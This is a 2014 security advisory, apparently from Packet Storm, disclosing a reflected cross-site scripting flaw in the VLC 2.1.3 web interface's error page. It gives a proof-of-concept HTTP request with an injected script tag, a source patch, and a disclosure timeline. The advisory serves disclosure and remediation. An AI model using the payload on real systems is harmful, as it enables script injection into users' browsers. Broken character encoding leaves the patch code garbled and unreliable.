VLC 2.1.3 Cross Site Scripting

2014-03-1800:00:00
Pietro Minniti
packetstormsecurity.com
JSON
`  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
=== Details ===  
Advisory: http://www.quantumleap.it/vlc-reflected-xss-vulnerability/  
Affected Product: VLC  
Version: 2.1.3 (older versions may be affected too)  
  
=== Executive Summary ===  
Using a specially crafted HTTP request, it is possible to exploit a lack  
in the neutralization[1] of the error pages output which includes the  
user submitted content. Successful exploitation of the vulnerabilities,  
results in the execution of arbitrary HTML and script code in user?s  
browser in context of the vulnerable website trough a ?Reflected XSS?  
  
=== Proof of Concept ===  
It has been discovered a reflected XSS vulnerability on error page in  
VLC Web Interface. The function ?httpd_HtmlError? in file  
?src/network/httpd.c? doesn?t sanitize the ?url? parameter, so an XSS  
attack can be executed. Below you can find a proof of concept of the  
vulnerability:  
  
GET /te<script>alert(?XSS?);</script>st HTTP/1.1  
Host: 192.168.1.101:8080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101  
Firefox/22.0 Iceweasel/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Authorization: Basic OmNpYW8=  
Connection: keep-alive  
  
=== Solution ===  
To quickly fix the security issue, in our Customer?s environment, we  
wrote the following small patch:  
  
<patch>  
? httpd.c 2014-02-14 15:24:55.393978968 +0100  
+++ httpd.patched.c 2014-02-14 15:24:44.404625054 +0100  
@@ -256,9 +256,12 @@ static const char *httpd_ReasonFromCode(static  
size_t httpd_HtmlError (char **body, int code, const char *url)  
{  
+ char *url_Encoded = NULL;  
const char *errname = httpd_ReasonFromCode (code);  
assert (errname != NULL);+ url_Encoded = convert_xml_special_chars  
(url ? url : ??);  
+  
int res = asprintf (body,  
?<?xml version=?1.0? encoding=?ascii? ?>n?  
?<!DOCTYPE html PUBLIC ?-//W3C//DTD XHTML 1.0 Strict//EN?"  
@@ -273,7 +276,9 @@ static size_t httpd_HtmlError (char **bo  
?<a href=?http://www.videolan.org?>VideoLAN</a>n?  
?</body>n?  
?</html>n?, errname, code, errname,  
- - (url ? ? (? : ??), (url ? url : ??), (url ? ?)? : ??));  
+ (url_Encoded ? ? (? : ??), (url_Encoded ? url_Encoded : ??),  
(url_Encoded ? ?)? : ??));  
+  
+ free (url_Encoded);if (res == -1)  
{  
</patch>  
  
This patch has been merged with the Main Line of the VLC GIT  
repository[2], it will be officially released in the build 2.2.0  
  
=== Disclosoure Timeline ===  
  
2013-12-02 ? Vulnerability Discovered  
2014-02-15 ? Initial vendor notification  
2014-02-20 ? The vendor fixed the vulnerability  
2014-03-18 ? Public advisory  
  
=== Discovered by ===  
Vulnerability discovered by Francesco Perna and Pietro Minniti of  
Quantum Leap s.r.l  
  
=== References ===  
[1]  
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet  
[2]  
http://git.videolan.org/?p=vlc.git;a=commit;h=fe5063ec5ad1873039ea719eb1f137c8f3bda84b  
  
- --   
Francesco Perna  
Quantum Leap SRL  
Sede Legale: Via Colle Scorrano n.5 65100 Pescara (PE)  
Sede Operativa: Circonvallazione Cornelia n. 125, 00165 Roma (RM)  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v2.0.17 (MingW32)  
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/  
  
iQEbBAEBAgAGBQJTKD4tAAoJEPBLO12s/SuDhEMH+K7vy+JqXc47ADWCmyokJ3Bu  
8VOZOH9lxt2wyHOD5tlf4tIQv6vQ2adGuSps16OIHRJ0KZ32PSJmBogHtPAsXFwP  
i8ubs7Co6lNVwbfLGz5TQkZw+lfudUJ3VEaEHRtxEEao2mb7YcafmRFMV+rsdB+E  
mgXdMy85G9tU/TDwi0//KBXCXmSFAHlEsaVlNVhqAUz3Eyg4hk9jOjaDat7ESt5Y  
yfd3uSO2yWthI6gJH2cLI5Y1R1L5zr4/raxM44/lZHm+XFOviiiX2L/NNpedwnn6  
Ax8y38AvQ8gFYvDtY+0tP4vBRrRAwzvGIZgSKdmeNMK+CpUvr+hZX53zVpTCPA==  
=sPV+  
-----END PGP SIGNATURE-----  
  
  
`
JSON